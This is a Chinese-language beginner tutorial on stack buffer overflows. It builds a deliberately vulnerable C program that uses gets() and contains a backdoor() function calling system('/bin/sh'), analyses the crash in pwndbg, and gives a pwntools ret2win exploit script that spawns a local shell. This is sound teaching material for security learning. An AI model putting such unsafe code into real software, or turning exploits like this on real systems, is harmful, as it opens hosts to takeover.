从零开始的 Pwn 之旅 - 栈溢出初识

前言

为什么输入一串杂乱的字符串,就能让程序崩溃?为什么输入一串特定的字符串,就能让程序执行任意代码?下面的内容将带你走进 Pwn 的世界,了解栈溢出是如何发生的,以及如何利用它来执行任意代码。

栈 (stack)

栈 (stack) 是一种数据结构,计算机中使用栈来存储函数调用的局部变量、返回地址等信息。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
+---------------------+
|     0x804000        |  <- 栈顶 (sp 指针)
+---------------------+
|        ...          |
+---------------------+
|     0x803000        |
+---------------------+
|        ...          |
+---------------------+
|     0x802000        |  <- 栈底 (ebp 指针)
+---------------------+
  • stack 是一个后进先出 (LIFO) 的数据结构,最后压入栈的元素最先被弹出。 如示意图所示数据是这样入栈的

    1
    2
    3
    4
    5
    
    push 0x802000
    ...
    push 0x803000
    ...
    push 0x804000

    当被弹出如下所示

    1
    2
    3
    
    pop rax ; rax = 0x804000
    pop rbx ; rbx = 0x804000 - 0x???
    ...
  • stack 在操作系统中是从高地址向低地址增长的。 这意味着栈顶的地址比栈底的地址大。 操作系统内存布局示意图:

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    
    +-------------------------------+
    |         内核空间 (Kernel)     |
    |-------------------------------|
    |         内核模块/驱动         |
    |-------------------------------|
    |         内核栈/内核数据       |
    +-------------------------------+
    |         用户空间 (User)       |
    |-------------------------------|
    |         堆 (Heap)             |
    |-------------------------------|
    |         未分配空间            |
    |-------------------------------|
    |         BSS 段 (未初始化数据) |
    |-------------------------------|
    |         数据段 (已初始化数据) |
    |-------------------------------|
    |         代码段 (Text)         |
    +-------------------------------+
    |         栈 (Stack)            |
    +-------------------------------+

采用这种栈结构, 被调用的函数可以轻松的程序的控制流 (PC 指针) 交还给调用者函数。

简单的栈溢出

编写一个简单的 C 程序

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
#include <stdio.h>
#include <stdlib.h>

int main() {
    char name[0x10];
    puts("Enter your name: ");
    gets(name);
    return 0;
}

void backdoor() {
  system("/bin/sh");
}

使用以下命令进行编译

1
gcc main.c -o main -fno-stack-protector -no-pie -std=c89

当运行这个程序时,它会提示输入名字。 当我们输入过长的字符串时程序就会崩溃

1
2
3
4
$ ./main
Enter your name:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[1]    47329 segmentation fault (core dumped)  ./main

下面让我们使用 gdb 来分析程序崩溃的原因

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
pwndbg> b main
Breakpoint 1 at 0x40114a
pwndbg> r
Starting program: /home/lhon901/Code/cpp/main
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Breakpoint 1, 0x000000000040114a in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────
 RAX  0x7ffff7f6de28 (environ) —▸ 0x7fffffffe108 —▸ 0x7fffffffe541 ◂— 'HOME=/home/lhon901'
 RBX  0
 RCX  0x403df0 —▸ 0x401110 ◂— endbr64
 RDX  0x7fffffffe108 —▸ 0x7fffffffe541 ◂— 'HOME=/home/lhon901'
 RDI  1
 RSI  0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
 R8   0x7ffff7f66680 —▸ 0x7ffff7f68000 ◂— 0
 R9   0x7ffff7f68000 ◂— 0
 R10  0x7fffffffdd10 ◂— 0x800000
 R11  0x203
 R12  0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
 R13  1
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 ◂— 0
 R15  0x403df0 —▸ 0x401110 ◂— endbr64
 RBP  0x7fffffffdfd0 —▸ 0x7fffffffe070 —▸ 0x7fffffffe0d0 ◂— 0
 RSP  0x7fffffffdfd0 —▸ 0x7fffffffe070 —▸ 0x7fffffffe0d0 ◂— 0
 RIP  0x40114a (main+4) ◂— sub rsp, 0x10
─────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────
 ► 0x40114a <main+4>      sub    rsp, 0x10              RSP => 0x7fffffffdfc0 (0x7fffffffdfd0 - 0x10)
   0x40114e <main+8>      lea    rax, [rip + 0xeaf]     RAX => 0x402004 ◂— 'Enter your name: '
   0x401155 <main+15>     mov    rdi, rax               RDI => 0x402004 ◂— 'Enter your name: '
   0x401158 <main+18>     call   puts@plt                    <puts@plt>

   0x40115d <main+23>     lea    rax, [rbp - 0x10]
   0x401161 <main+27>     mov    rdi, rax
   0x401164 <main+30>     call   gets@plt                    <gets@plt>

   0x401169 <main+35>     mov    eax, 0                 EAX => 0
   0x40116e <main+40>     leave
   0x40116f <main+41>     ret

   0x401170 <backdoor>    push   rbp
───────────────────────────────────────[ STACK ]───────────────────────────────────────
00:0000│ rbp rsp 0x7fffffffdfd0 —▸ 0x7fffffffe070 —▸ 0x7fffffffe0d0 ◂— 0
01:0008│+008     0x7fffffffdfd8 —▸ 0x7ffff7da76b5 ◂— mov edi, eax
02:0010│+010     0x7fffffffdfe0 —▸ 0x7ffff7fc6000 ◂— 0x3010102464c457f
03:0018│+018     0x7fffffffdfe8 —▸ 0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
04:0020│+020     0x7fffffffdff0 ◂— 0x1ffffe030
05:0028│+028     0x7fffffffdff8 —▸ 0x401146 (main) ◂— push rbp
06:0030│+030     0x7fffffffe000 ◂— 0
07:0038│+038     0x7fffffffe008 ◂— 0x552e4676b89c3459
─────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────
0         0x40114a main+4
   1   0x7ffff7da76b5 None
   2   0x7ffff7da7769 __libc_start_main+137
   3         0x401085 _start+37
───────────────────────────────────────────────────────────────────────────────────────
pwndbg>

这里我们在 0x401169 处设置断点, 运行过去

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
pwndbg> b *0x401169
Breakpoint 2 at 0x401169
pwndbg> pwn cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
This command is deprecated in Pwndbg. Please use the GDB's built-in syntax for running shell commands instead: !pwn <args>
pwndbg> c
Continuing.
Enter your name:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

Breakpoint 2, 0x0000000000401169 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────
*RAX  0x7fffffffdfc0 ◂— 0x6161616261616161 ('aaaabaaa')
 RBX  0
*RCX  0x7ffff7f687c0 ◂— 0
*RDX  0x7ffff7f687c0 ◂— 0
*RDI  0x7fffffffdfc1 ◂— 'aaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
*RSI  0x4056b1 ◂— 0x6361616162616161 ('aaabaaac')
*R8   0x405779 ◂— 0
*R9   0xfbad2288
*R10  0
*R11  0x202
 R12  0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
 R13  1
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 ◂— 0
 R15  0x403df0 —▸ 0x401110 ◂— endbr64
 RBP  0x7fffffffdfd0 ◂— 'eaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
*RSP  0x7fffffffdfc0 ◂— 0x6161616261616161 ('aaaabaaa')
*RIP  0x401169 (main+35) ◂— mov eax, 0
─────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────
   0x401155 <main+15>       mov    rdi, rax               RDI => 0x402004 ◂— 'Enter your name: '
   0x401158 <main+18>       call   puts@plt                    <puts@plt>

   0x40115d <main+23>       lea    rax, [rbp - 0x10]
   0x401161 <main+27>       mov    rdi, rax
   0x401164 <main+30>       call   gets@plt                    <gets@plt>

 ► 0x401169 <main+35>       mov    eax, 0                 EAX => 0
   0x40116e <main+40>       leave
   0x40116f <main+41>       ret

   0x401170 <backdoor>      push   rbp
   0x401171 <backdoor+1>    mov    rbp, rsp
   0x401174 <backdoor+4>    lea    rax, [rip + 0xe9b]     RAX => 0x402016 ◂— 0x68732f6e69622f /* '/bin/sh' */
───────────────────────────────────────[ STACK ]───────────────────────────────────────
00:0000│ rax rsp rdi-1 0x7fffffffdfc0 ◂— 0x6161616261616161 ('aaaabaaa')
01:0008│-008           0x7fffffffdfc8 ◂— 'caaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
02:0010│ rbp           0x7fffffffdfd0 ◂— 'eaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
03:0018│+008           0x7fffffffdfd8 ◂— 'gaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
04:0020│+010           0x7fffffffdfe0 ◂— 'iaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
05:0028│+018           0x7fffffffdfe8 ◂— 'kaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
06:0030│+020           0x7fffffffdff0 ◂— 'maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
07:0038│+028           0x7fffffffdff8 ◂— 'oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
─────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────
0         0x401169 main+35
   1 0x6161616861616167 None
   2 0x6161616a61616169 None
   3 0x6161616c6161616b None
   4 0x6161616e6161616d None
   5 0x616161706161616f None
   6 0x6161617261616171 None
   7 0x6161617461616173 None
───────────────────────────────────────────────────────────────────────────────────────
pwndbg>

当我们运行到 ret 时, 发现 ret 指令返回到了 0x6161616861616167 这个地址 这是一个非法指令,程序因此崩溃了。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
─────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────
   0x40115d <main+23>    lea    rax, [rbp - 0x10]
   0x401161 <main+27>    mov    rdi, rax
   0x401164 <main+30>    call   gets@plt                    <gets@plt>

b+ 0x401169 <main+35>    mov    eax, 0                 EAX => 0
   0x40116e <main+40>    leave
 ► 0x40116f <main+41>    ret                                <0x6161616861616167>



───────────────────────────────────────[ STACK ]───────────────────────────────────────

在这个程序中,我们的输入会被存储在 char name[0x10] 这个数组中, 这个数组是 main 函数的局部变量, 所以它会被存储在栈上

而正好, 函数的返回地址也被存储在栈上, 当我们输入的字符串超过 0x10 字节时, 就会覆盖掉返回地址, 导致程序崩溃。

那么,如果我们将返回地址修改为恶意程序的地址,那么程序是不是就会执行恶意程序呢?答案是肯定的。

此时栈结构如下:

1
2
3
4
5
6
7
8
9
+--------------------------+
|      "aaabaaac"          |  <- rsp
+--------------------------+
|        ...               |
+--------------------------+
| 上一层栈帧的 rbp (old rbp)|  <- rbp
+--------------------------+
|   return address (被覆盖) |  <- 被覆盖
+--------------------------+

因为程序的地址中含有不可见字符,我们使用 python 来完成这项挑战

使用 objdump 查看程序的地址

1
2
$ objdump -d main | grep backdoor
0000000000401170 <backdoor>:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
from pwn import *

p = process("./main")  # 启动程序

backdoor = 0x401170  # backdoor 函数的地址
# 0x000000000040101a : ret
ret = 0x40101a
payload = b"a" * (0x10 + 0x8) + p64(ret) + p64(backdoor)  # 填充到 0x10 字节 + 8 字节的返回地址

p.sendline(payload)  # 发送 payload

p.interactive()  # 进入交互模式
这里添加 ret 是为了栈对齐,后面的文章会展开来讲
  • process("./main") 启动程序
  • p64(backdoor) 将 backdoor 函数的地址转换为 64 位小端格式
  • sendline(payload) 发送 payload
  • p.interactive() 进入交互模式

运行 python 程序

1
2
3
4
5
6
7
$ python exp.py
[+] Starting local process './main': pid 56742
[*] Switching to interactive mode
Enter your name:
$ whoami
lhon901
$

可以看到我们成功执行了 backdoor 函数,获得了一个 shell